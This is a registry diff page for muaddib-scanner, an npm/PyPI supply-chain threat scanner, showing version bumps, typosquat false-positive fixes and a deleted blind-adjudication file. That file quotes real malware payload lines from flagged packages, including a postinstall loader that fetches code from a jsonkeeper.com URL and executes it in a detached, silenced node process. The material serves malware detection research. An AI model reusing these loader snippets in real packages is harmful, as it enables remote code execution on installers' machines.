npm - muaddib-scanner - Versions diffs - 2.11.116 → 2.11.118 - Mend

muaddib-scanner 2.11.116 → 2.11.118

This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.

Files changed (11)

package/README.md +7 -7
package/package.json +1 -1
package/{self-scan-v2.11.116.json → self-scan-v2.11.118.json} +1 -1
package/src/integrations/webhook.js +1 -1
package/src/scanner/module-graph/detect-cross-file.js +1 -1
package/src/scanner/typosquat.js +28 -8
package/src/scoring.js +1 -1
package/src/sdk-destination.js +1 -1
package/audit-data/adjudication-2026-06-14.json +0 -56
package/audit-data/fpr-baseline-2026-06-14.json +0 -2648
package/src/ml/model-trees-backup.js +0 -11

package/README.md CHANGED

@@ -30,7 +30,7 @@
 npm and PyPI supply-chain attacks are exploding. Shai-Hulud compromised 25K+ repos in 2025. Existing tools detect threats but don't help you respond.
-MUAD'DIB combines **20 parallel scanners** (264 detection rules), a **deobfuscation engine**, **inter-module dataflow analysis**, **compound scoring** (17 compound rules), and a gVisor/Docker sandbox to detect known threats and suspicious behavioral patterns in npm and PyPI packages. An XGBoost classifier exists in the codebase but is **currently inactive** (see [Evaluation Metrics](#evaluation-metrics) → ML Classifier section).
+MUAD'DIB combines **20 parallel scanners** (266 detection rules), a **deobfuscation engine**, **inter-module dataflow analysis**, **compound scoring** (17 compound rules), and a gVisor/Docker sandbox to detect known threats and suspicious behavioral patterns in npm and PyPI packages. An XGBoost classifier exists in the codebase but is **currently inactive** (see [Evaluation Metrics](#evaluation-metrics) → ML Classifier section).
 ---
@@ -202,9 +202,9 @@ muaddib replay                     # Ground truth validation (90/94 TPR@3, v2.11
 | Python Source (PYSRC) | Import-time / install-time RCE patterns in `__init__.py` / `setup.py` (v2.11.41 — closes TrapDoor PyPI gap) |
 | Python AST (PYAST) | Tree-sitter-Python AST with taint-aware detectors (v2.11.42+) |
-### 264 detection rules
+### 266 detection rules
-All rules (259 RULES + 5 PARANOID) are mapped to MITRE ATT&CK techniques. See [SECURITY.md](SECURITY.md#detection-rules-v21176) for the complete rules reference.
+All rules (261 RULES + 5 PARANOID) are mapped to MITRE ATT&CK techniques. See [SECURITY.md](SECURITY.md#detection-rules-v211117) for the complete rules reference.
 ### Detected campaigns
@@ -278,7 +278,7 @@ With pre-commit framework:
 ```yaml
 repos:
   - repo: https://github.com/DNSZLSK/muad-dib
-    rev: v2.11.76
+    rev: v2.11.117
     hooks:
       - id: muaddib-scan
 ```
@@ -303,7 +303,7 @@ These are the numbers a user gets when running `muaddib scan` against npm or PyP
 | **FPR PyPI** (v2.11.48, first honest measurement) | **9.68%** (12/124 scanned, 132 total) | **Track D fixed the PyPI downloader** — removed `pip --no-binary :all:` flag (forced compile of wheel-only packages, timed out 38% of the time) + added `.whl` extraction via `extractArchive()`. Brought 42 previously-skipped giants (numpy/pandas/django/matplotlib/scikit-learn/...) into scope. All 12 FPs cluster at score 25-35: this is the cap-PyPI-35 artifact, not new rule misfires. Lifting the cap (Track E) would drop FPR PyPI to ≈0%. 8 residual fails are >500MB packages (torch, tensorflow, scipy, opencv-python, ansible…) hitting the 30s `PACK_TIMEOUT_MS`. |
 | **ADR** (Adversarial + Holdout, v2.11.48) | **96.26%** (103/107) | 67 adversarial + 40 holdout, global threshold=20. Stable vs v2.10.95. |
-**4132 tests** across 115 files. **264 rules** (259 RULES + 5 PARANOID; v2.11.67/70 Phantom Gyp added PKG-023 + COMPOUND-017).
+**4414 tests** across 141 files. **266 rules** (261 RULES + 5 PARANOID; v2.11.67/70 Phantom Gyp added PKG-023 + COMPOUND-017).
 **Known issues (v2.11.48):**
 - *Cap PyPI à 35/100*: Python samples plafonnent à `riskScore=35` even when `globalRiskScore=100`. Confirmed empirically — all 12 PyPI FPs at score 25-35 (flask 32, django 35, tornado 35, bottle 30, pandas 25, matplotlib 25, plotly 25, bokeh 25, pymongo 35, coverage 32, fabric 35, websockets 35). Lifting the cap will simultaneously drop FPR PyPI to ≈0% and unblock PyPI MALWARE detection at higher thresholds. Track E target.
@@ -380,7 +380,7 @@ npm test
 ### Testing
-- **4132 tests** across 115 modular test files
+- **4414 tests** across 141 modular test files
 - **56 fuzz tests** - Malformed inputs, ReDoS, unicode, binary
 - **Datadog 17K benchmark** - 14,587 confirmed malware samples (in-scope)
 - **Ground truth validation** - 96 real-world attacks (95.74% TPR@3, 88.30% TPR@20 — v2.11.48 full measure on 94 in-scope)
@@ -401,7 +401,7 @@ npm test
 - [Documentation Index](docs/INDEX.md) - All documentation in one place
 - [Evaluation Methodology](docs/EVALUATION_METHODOLOGY.md) - Experimental protocol, holdout scores
 - [Threat Model](docs/threat-model.md) - What MUAD'DIB detects and doesn't detect
-- [Security Policy](SECURITY.md) - Detection rules reference (259 rules)
+- [Security Policy](SECURITY.md) - Detection rules reference (261 rules)
 - [Security Audit](docs/SECURITY_AUDIT.md) - Bypass validation report
 - [FP Analysis](docs/EVALUATION.md) - Historical false positive analysis

package/package.json CHANGED

@@ -1,6 +1,6 @@
 {
   "name": "muaddib-scanner",
-  "version": "2.11.116",
+  "version": "2.11.118",
   "description": "Supply-chain threat detection & response for npm & PyPI/Python",
   "main": "src/index.js",
   "bin": {

package/{self-scan-v2.11.116.json → self-scan-v2.11.118.json} RENAMED

@@ -1,6 +1,6 @@
 {
   "target": "node_modules",
-  "timestamp": "2026-06-14T17:31:14.864Z",
+  "timestamp": "2026-06-15T12:53:45.305Z",
   "threats": [
     {
       "type": "string_mutation_obfuscation",

package/src/integrations/webhook.js CHANGED

@@ -406,7 +406,7 @@ async function resolveHostWithRetry(hostname, opts = {}) {
         dns.promises.resolve4(hostname).catch(() => []),
         dns.promises.resolve6(hostname).catch(() => [])
       ]);
-    } catch (e) { lastErr = e; }
+    } catch { /* DNS threw — ipv4/ipv6 stay [], handled by the no-records path below */ }
     const all = [...ipv4, ...ipv6];
     if (all.length > 0) return { ipv4, ipv6, all };
     lastErr = new Error(`Webhook blocked: no DNS records found for ${hostname}`);
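
The hunk above drops the `lastErr = e` assignment because each resolver promise already swallows its own rejection and the no-records path sets `lastErr` unconditionally. A minimal sketch of that pattern follows. `resolveBothFamilies` and the injected `resolver` parameter are hypothetical names used so the example runs without network access; the retry loop around this step in `resolveHostWithRetry` is not visible in the diff and is omitted here.

```javascript
// Hypothetical helper, not the package's resolveHostWithRetry.
// `resolver` is any object exposing resolve4/resolve6 that return promises
// (for example require('node:dns').promises).
async function resolveBothFamilies(hostname, resolver) {
  let ipv4 = [];
  let ipv6 = [];
  try {
    [ipv4, ipv6] = await Promise.all([
      resolver.resolve4(hostname).catch(() => []), // per-family failure -> []
      resolver.resolve6(hostname).catch(() => [])
    ]);
  } catch {
    // Only reached if a resolver call throws synchronously; ipv4/ipv6 stay [].
  }
  const all = [...ipv4, ...ipv6];
  if (all.length > 0) return { ipv4, ipv6, all };
  // Same message as the hunk: an empty result is reported as a blocked webhook.
  throw new Error(`Webhook blocked: no DNS records found for ${hostname}`);
}

// Usage with a stub resolver: IPv4 answers, IPv6 rejects.
const stubResolver = {
  resolve4: async () => ['93.184.216.34'],
  resolve6: async () => { throw new Error('ENODATA'); }
};
resolveBothFamilies('example.test', stubResolver)
  .then(({ all }) => console.log(all));
```

Because every failure mode funnels into the same empty-array state, the caught exception carries no information that the no-records error does not already convey, which is consistent with the hunk's comment.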

package/src/scanner/module-graph/detect-cross-file.js CHANGED

@@ -978,7 +978,7 @@ function isNetworkSinkDescriptor(sink) {
  * file references a suspicious/paste host, a public IP, or any unknown domain (so a real
  * exfil like ecto — webhook.site + direct-IP — keeps firing). The package stays visible
  * via its other (lower-severity) signals, the same way intent-graph skips SDK pairs.
- * Rationale + corpus: FPR-segment-A-diagnosis-2026-06-14.md.
+ * Rationale + corpus: chantier FPR segment A (2026-06).
  *
  * @param {Array} flows - assembled cross-file flows (main + callback + emitter)
  * @param {string} packagePath - package root, to resolve sink file content

package/src/scanner/typosquat.js CHANGED

@@ -73,6 +73,23 @@ const LEGIT_BOUNDARY_TOKENS = new Set([
   'v2', 'v3', 'v4', 'next', 'latest', 'stable', 'lts', 'legacy', 'beta', 'alpha'
 ]);
+// RT-C1-FPR (2026-06, n=61 blind adjudication → boundary-squat measured 100% FP): popular
+// packages whose names are GENERIC tech/English words appear as a legitimate TRAILING token
+// in countless real packages — class-validator, graphile-config, ansi-colors, sinon-chai,
+// react-helmet-async, swagger-ui-express, short-uuid, react-router-redux, openapi-typescript,
+// tree-sitter-c-sharp, agent-commander. Suffix boundary-squat on these is unreliable, so they
+// are NOT matched. Distinctive brand names (axios, lodash, chalk, crypto-js — incl. the
+// plain-crypto-js / secure-axios FN-guards) stay matchable. A genuine `<x>-<generic>` squat is
+// caught by its CODE (exfil/RCE + the Track-R malice floor), not by name shape (see below).
+const GENERIC_POPULAR_NAMES = new Set([
+  'validator', 'config', 'colors', 'async', 'chai', 'typescript', 'request', 'uuid',
+  'redux', 'express', 'sharp', 'commander', 'debug', 'glob', 'yaml', 'cors', 'helmet',
+  'canvas', 'immutable', 'classnames',
+  // Infra/framework brands that are also common legit trailing tokens (rate-limit-redis,
+  // connect-redis, shadcn-svelte, authentikt-svelte) — same measured-FP class, same FN floor.
+  'redis', 'svelte',
+]);
 // Packages legitimes courts ou qui ressemblent a des populaires
 const WHITELIST = new Set([
   // Packages tres courts legitimes
@@ -456,14 +473,13 @@ function findDependencyBoundarySquat(name) {
     if (lower === popular) continue;
     if (popular.includes('-')) {
-      // Multi-token popular (e.g. crypto-js): match prefix or suffix at hyphen boundary
-      let extra = null;
-      if (lower.endsWith('-' + popular)) {
-        extra = lower.slice(0, lower.length - popular.length - 1);
-      } else if (lower.startsWith(popular + '-')) {
-        extra = lower.slice(popular.length + 1);
-      }
-      if (extra === null || extra.length === 0) continue;
+      // Multi-token popular (e.g. crypto-js): a squat PREPENDS a deceptive qualifier
+      // (plain-crypto-js → endsWith). The reverse `<popular>-<suffix>` (date-fns-tz,
+      // aws-sdk-client-mock, core-js-compat) is the popular package's OWN ecosystem extension —
+      // never a squat — so the prefix-position match is dropped (2026-06 FPR fix, 100% FP).
+      if (!lower.endsWith('-' + popular)) continue;
+      const extra = lower.slice(0, lower.length - popular.length - 1);
+      if (extra.length === 0) continue;
       // Reject if extra is a legit boundary token (single token only)
       if (!extra.includes('-') && LEGIT_BOUNDARY_TOKENS.has(extra)) continue;
       return { original: POPULAR_PACKAGES[i], type: 'boundary_squat', distance: extra.length, extra };
@@ -480,6 +496,10 @@ function findDependencyBoundarySquat(name) {
       const tokens = lower.split('-');
       if (tokens.length === 1) continue;
       if (tokens[tokens.length - 1] !== popular) continue;     // popular must be the trailing token
+      // Generic-word popular (validator/config/colors/async/chai/typescript/...) is a common
+      // legitimate trailing token (class-validator, graphile-config, ansi-colors) — 100% FP in
+      // the 2026-06 measurement. Distinctive brands (axios → secure-axios FN-guard) still match.
+      if (GENERIC_POPULAR_NAMES.has(popular)) continue;
       const siblings = tokens.slice(0, -1);
       // Benign ecosystem variant if every prefix token is a legit qualifier (ts-jest, babel-jest).
       if (siblings.every(t => LEGIT_BOUNDARY_TOKENS.has(t) || isLegitimateVariant(t))) continue;
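
The two typosquat.js hunks can be read together as one decision procedure. The sketch below is a simplified reconstruction under stated assumptions, not the package's `findDependencyBoundarySquat`. The three sets are tiny illustrative subsets, the `isLegitimateVariant` check is left out, and the return shape of the single-token branch is assumed because the diff does not show it.

```javascript
// Illustrative subsets only; the real lists in typosquat.js are much larger.
const POPULAR = ['crypto-js', 'axios', 'validator'];
const GENERIC_POPULAR = new Set(['validator']);
const LEGIT_TOKENS = new Set(['next', 'latest', 'beta']);

function boundarySquatSketch(name) {
  const lower = name.toLowerCase();
  for (const popular of POPULAR) {
    if (lower === popular) continue;
    if (popular.includes('-')) {
      // Multi-token popular: only `<extra>-<popular>` counts after the change.
      if (!lower.endsWith('-' + popular)) continue;
      const extra = lower.slice(0, lower.length - popular.length - 1);
      if (extra.length === 0) continue;
      if (!extra.includes('-') && LEGIT_TOKENS.has(extra)) continue;
      return { original: popular, extra };
    }
    // Single-token popular: it must be the trailing hyphen-separated token.
    const tokens = lower.split('-');
    if (tokens.length === 1) continue;
    if (tokens[tokens.length - 1] !== popular) continue;
    if (GENERIC_POPULAR.has(popular)) continue; // new generic-word skip
    const siblings = tokens.slice(0, -1);
    if (siblings.every((t) => LEGIT_TOKENS.has(t))) continue;
    return { original: popular, extra: siblings.join('-') }; // assumed shape
  }
  return null;
}

console.log(boundarySquatSketch('plain-crypto-js')); // flagged against crypto-js
console.log(boundarySquatSketch('crypto-js-compat')); // no longer flagged
console.log(boundarySquatSketch('class-validator'));  // generic trailing token
```

In this sketch the prefix-position name and the generic-word name both fall through to `null`, while `plain-crypto-js` and `secure-axios` still match, mirroring the FN-guards named in the added comments.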

package/src/scoring.js CHANGED

@@ -1196,7 +1196,7 @@ function applyFPReductions(threats, reachableFiles, packageName, packageDeps, re
     }
   }
-  // FPR sink-coupling gate (chantier 2026-06 — FPR-baseline-2026-06-14.md). credential_regex_harvest
+  // FPR sink-coupling gate (chantier FPR 2026-06). credential_regex_harvest
   // is a weak signal alone: a credential-shaped regex co-located with a network call, with NO proof
   // the matched secret flows out and NO host-reputation check (ast.js:hasCredentialInsideRegex +
   // hasNetworkCallInFile). The blind FPR baseline measured 94.4% FP on it — it fires on nodemailer

package/src/sdk-destination.js CHANGED

@@ -88,7 +88,7 @@ function extractDomain(url) {
     // Capture only valid hostname characters so a path-less URL immediately followed by
     // a quote/paren (e.g. fetch('https://api.openai.com')) does not absorb the trailing
     // ')" into the host. Stops at /, :, ?, #, quotes, parens, etc.
-    const match = url.match(/^https?:\/\/([a-zA-Z0-9.\-]+)/i);
+    const match = url.match(/^https?:\/\/([a-zA-Z0-9.-]+)/i);
     return match ? match[1].toLowerCase() : null;
   } catch {
     return null;
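
The regex change in this hunk looks behavior-preserving: inside a character class, a hyphen placed last is literal, so `[a-zA-Z0-9.-]` and `[a-zA-Z0-9.\-]` accept the same characters. The sketch below checks that on a few inputs. `extractDomainSketch` is a hypothetical stand-alone copy of the visible lines, and the `try`/`catch` wrapper is assumed from the hunk's trailing context.

```javascript
// Stand-alone copy of the lines visible in the hunk (name is hypothetical).
function extractDomainSketch(url) {
  try {
    const match = url.match(/^https?:\/\/([a-zA-Z0-9.-]+)/i);
    return match ? match[1].toLowerCase() : null;
  } catch {
    return null; // e.g. url is not a string
  }
}

// Old and new character classes, compared on the same inputs.
const oldHost = /^https?:\/\/([a-zA-Z0-9.\-]+)/i;
const newHost = /^https?:\/\/([a-zA-Z0-9.-]+)/i;
const samples = [
  "https://api.openai.com')",
  'https://My-Host.example.com:8443/path',
  'ftp://example.com'
];
for (const s of samples) {
  const a = s.match(oldHost);
  const b = s.match(newHost);
  console.log(s, '->', extractDomainSketch(s), (a && a[1]) === (b && b[1]));
}
```

The first sample is the case described in the source comment: the capture stops before the trailing quote and parenthesis instead of absorbing them into the host.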

package/audit-data/adjudication-2026-06-14.json DELETED

@@ -1,56 +0,0 @@
-{
-  "meta": {
-    "period": "2026-06-14",
-    "method": "blind code read of archive/ tarballs (not MUAD'DIB labels); verdict on sink reached, not signal shape",
-    "context": "Chantier FPR Etape A. Top-band suspects (daily 2026-06-14, score 145-150) + mid-band credential_regex_harvest probes (score 20). See FPR-adjudication-2026-06-14.md + tests/samples/sink-coupling-fp/MANIFEST.md",
-    "total_reviewed": 14,
-    "tally": { "MALWARE": 2, "UNCERTAIN": 1, "FP": 11 },
-    "rubric": "TP = signal coupled to a sink (remote-code exec / exfil to an anomalous host: paste-site, dyn-DNS, raw IP). FP = same signal but local build / first-party host / vendored bundle / no dataflow to sink."
-  },
-  "results": [
-    { "package": "chalk-pro@7.0.4", "day": "2026-06-14", "score": 150, "verdict": "MALWARE", "review_type": "deep",
-      "reasoning": "Masquerade: published as 'chalk' but is nodemailer source + pino deps + added network deps (axios/request/socket.io-client/sqlite3). postinstall 'node lib/utils/index.js' spawns a DETACHED, fully-silenced node process running lib/utils/smtp-connection/index.js, which fetches & execs remote code. Same jsonkeeper C2 as richtext-editor-ui.",
-      "payload_quotes": ["spawn(process.execPath,[smtp-connection/index.js],{detached:true,stdio:['ignore','ignore','ignore']}).unref()", "axios.get(\"https://www.jsonkeeper.com/b/TOAAK\").then(r => new Function(\"require\", r.data.cookie)(require))"],
-      "fp_trigger_pattern": null, "campaign": "jsonkeeper-staged-loader-2026-06" },
-    { "package": "richtext-editor-ui@1.0.0", "day": "2026-06-14", "score": 150, "verdict": "MALWARE", "review_type": "deep",
-      "reasoning": "Name/content mismatch. postinstall.js decodes atob(jsonkeeper URL), axios.get, pipes returned code into a detached node via stdin. Pure remote staged loader. Same actor as chalk-pro.",
-      "payload_quotes": ["const s1=(await axios.get(atob('...jsonkeeper.com/b/7EBZP'))).data.content", "spawn('node',[],{detached:true,stdio:['pipe','ignore','ignore']}); child.stdin.write(s1)"],
-      "fp_trigger_pattern": null, "campaign": "jsonkeeper-staged-loader-2026-06" },
-    { "package": "xzcbailz@1.0.3", "day": "2026-06-14", "score": 145, "verdict": "UNCERTAIN", "review_type": "deep",
-      "reasoning": "Baileys (WhatsApp) fork. preinstall engine-requirements.js is a benign Node-version check. 'newsletter'/'subscribe' hits are all in STOCK Baileys files (messages-recv, chats, jid-utils) -> lifecycle_newsletter_hijack likely misfired on native Baileys newsletter handling. No remote loader / exfil found. Would need a diff vs upstream Baileys to confirm an injected auto-follow.",
-      "payload_quotes": [], "fp_trigger_pattern": "baileys_fork_newsletter_misfire" },
-    { "package": "@kinoshitastudio/noa@0.1.0", "day": "2026-06-14", "score": 150, "verdict": "FP", "review_type": "deep",
-      "reasoning": "Self-hosted LOCAL web terminal (express+ws+node-pty), token-gated, path-traversal guarded. direct_ip_exfil = a hardcoded Tailscale IP in a console.log start banner, NOT an egress sink. lifecycle_hidden_payload = postinstall node-pty native rebuild.",
-      "payload_quotes": ["const tailscaleIP='100.107.218.60'; console.log(`Tailscale -> http://${tailscaleIP}:${PORT}`)"], "fp_trigger_pattern": "local_web_terminal" },
-    { "package": "@lordofdestiny/mynumber@1.5.2", "day": "2026-06-14", "score": 150, "verdict": "FP", "review_type": "deep",
-      "reasoning": "C++ native addon (binding.gyp, CMakeLists, src/*.cpp, @mapbox/node-pre-gyp). install.js = node-pre-gyp prebuilt-fetch-or-build (LOCAL toolchain). No exfil/credential sink.",
-      "payload_quotes": [], "fp_trigger_pattern": "native_addon_node_pre_gyp" },
-    { "package": "mandrel@1.64.0", "day": "2026-06-14", "score": 145, "verdict": "FP", "review_type": "deep",
-      "reasoning": "Code-quality / AI-agents CLI. 44x dynamic_import = lib/cli command lazy-loading. postinstall best-effort 'mandrel sync' (documented no-net/no-shell, exits 0). No sink.",
-      "payload_quotes": [], "fp_trigger_pattern": "cli_dynamic_import_loader" },
-    { "package": "vibes-prompt-runner@0.1.0-beta.2", "day": "2026-06-14", "score": 150, "verdict": "FP", "review_type": "deep",
-      "reasoning": "WebdriverIO + VS Code extension test harness. postinstall patch-wdio.js patches its OWN node_modules (wdio-vscode-service, VS Code main.js) + local codesign. No remote fetch / exfil.",
-      "payload_quotes": [], "fp_trigger_pattern": "wdio_vscode_test_harness" },
-    { "package": "xp-gate@0.5.1", "day": "2026-06-14", "score": 150, "verdict": "FP", "review_type": "deep",
-      "reasoning": "Code-quality gate CLI with git hooks (husky-style) + multi-language adapters + AI skills. 0 runtime deps. git_hooks_injection = installs pre-commit/pre-push hooks. prepack build script. No network/credential/exfil. (scoped @boyingliu01/xp-gate is the same tool.)",
-      "payload_quotes": [], "fp_trigger_pattern": "git_hook_dev_tool" },
-    { "package": "opticore-asymmetric-cryption@1.0.0", "day": "2026-06-14", "score": 147, "verdict": "FP", "review_type": "deep",
-      "reasoning": "RSA crypto helper from a coherent vendor family (opticore-*, author guyzoum77). postinstall.mjs = cosmetic cfonts/chalk banner + 'run npx opticore-gen-keys' hint, with isDev/isCI guard. typosquat_lifecycle/dependency_typosquat_require = boundary-squat compound misfire on the family deps. No sink.",
-      "payload_quotes": ["cfonts.say('OpticoreJS',...); console.log('Run: npx opticore-gen-keys')"], "fp_trigger_pattern": "typosquat_compound_misfire" },
-    { "package": "react-markup@0.0.0-experimental", "day": "2026-06-14", "score": 20, "verdict": "FP", "review_type": "deep",
-      "reasoning": "Official React package (experimental channel), 0 deps, 0 scripts. cjs/*.development.js bundles. credential_regex_harvest + dangerous_call_eval + intent_credential_exfil all fire on the minified-ish React bundle. No sink.",
-      "payload_quotes": [], "fp_trigger_pattern": "vendor_bundle_minified" },
-    { "package": "@floless/app@0.18.1", "day": "2026-06-14", "score": 20, "verdict": "FP", "review_type": "deep",
-      "reasoning": "Local AI-app launcher (SEA build, skills, web UI). 0 deps, NO install hook. detached/silent_stealth/lifecycle_dangerous_exec = launching its OWN local server (launch.mjs). No remote exfil.",
-      "payload_quotes": [], "fp_trigger_pattern": "local_app_launcher" },
-    { "package": "@remotion/whisper-web@4.0.477", "day": "2026-06-14", "score": 20, "verdict": "FP", "review_type": "deep",
-      "reasoning": "Whisper speech-to-text WASM for Remotion. remote_code_load = downloads the GGML model from huggingface.co/ggerganov/whisper.cpp (first-party ML host). No exfil.",
-      "payload_quotes": ["https://huggingface.co/ggerganov/whisper.cpp/resolve/main/ggml-"], "fp_trigger_pattern": "ml_model_download" },
-    { "package": "@vxrn/react-native-prebuilt@1.17.11", "day": "2026-06-14", "score": 20, "verdict": "FP", "review_type": "deep",
-      "reasoning": "Vendored React + React-Native renderers (ReactFabric-dev.js etc.) for the vxrn/One bundler. staged_payload/proxy_data_intercept/builtin_override_exfil fire on the vendored RN reconciler. 0 fetch/ws, no install hook.",
-      "payload_quotes": [], "fp_trigger_pattern": "vendored_framework_internals" },
-    { "package": "@kilocode/cli-darwin-x64@7.3.44", "day": "2026-06-14", "score": 20, "verdict": "FP", "review_type": "deep",
-      "reasoning": "AI coding CLI (174MB: prebuilt darwin binary + Shiki language-grammar web console assets). websocket_c2/remote_code_load/staged_binary_payload fire on the prebuilt binary + the LLM-provider catalog (opencode.ai, zenmux.ai, perplexity, cloudflare...). Not C2.",
-      "payload_quotes": [], "fp_trigger_pattern": "ai_cli_binary_catalog" }
-  ]
-}
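
The `meta.tally` and `meta.total_reviewed` fields of the deleted file can be cross-checked against its `results` array. The sketch below does that with only the `package` and `verdict` fields copied from the entries above. `tallyVerdicts` is a hypothetical helper, not something shipped in the package.

```javascript
// Package/verdict pairs copied from the deleted adjudication file.
const results = [
  { package: 'chalk-pro@7.0.4', verdict: 'MALWARE' },
  { package: 'richtext-editor-ui@1.0.0', verdict: 'MALWARE' },
  { package: 'xzcbailz@1.0.3', verdict: 'UNCERTAIN' },
  { package: '@kinoshitastudio/noa@0.1.0', verdict: 'FP' },
  { package: '@lordofdestiny/mynumber@1.5.2', verdict: 'FP' },
  { package: 'mandrel@1.64.0', verdict: 'FP' },
  { package: 'vibes-prompt-runner@0.1.0-beta.2', verdict: 'FP' },
  { package: 'xp-gate@0.5.1', verdict: 'FP' },
  { package: 'opticore-asymmetric-cryption@1.0.0', verdict: 'FP' },
  { package: 'react-markup@0.0.0-experimental', verdict: 'FP' },
  { package: '@floless/app@0.18.1', verdict: 'FP' },
  { package: '@remotion/whisper-web@4.0.477', verdict: 'FP' },
  { package: '@vxrn/react-native-prebuilt@1.17.11', verdict: 'FP' },
  { package: '@kilocode/cli-darwin-x64@7.3.44', verdict: 'FP' }
];

// Hypothetical helper: count entries per verdict label.
function tallyVerdicts(entries) {
  const tally = {};
  for (const { verdict } of entries) {
    tally[verdict] = (tally[verdict] || 0) + 1;
  }
  return tally;
}

console.log(results.length, tallyVerdicts(results));
```

The counts agree with the file's own metadata: 14 reviewed, of which 2 are MALWARE, 1 is UNCERTAIN, and 11 are FP.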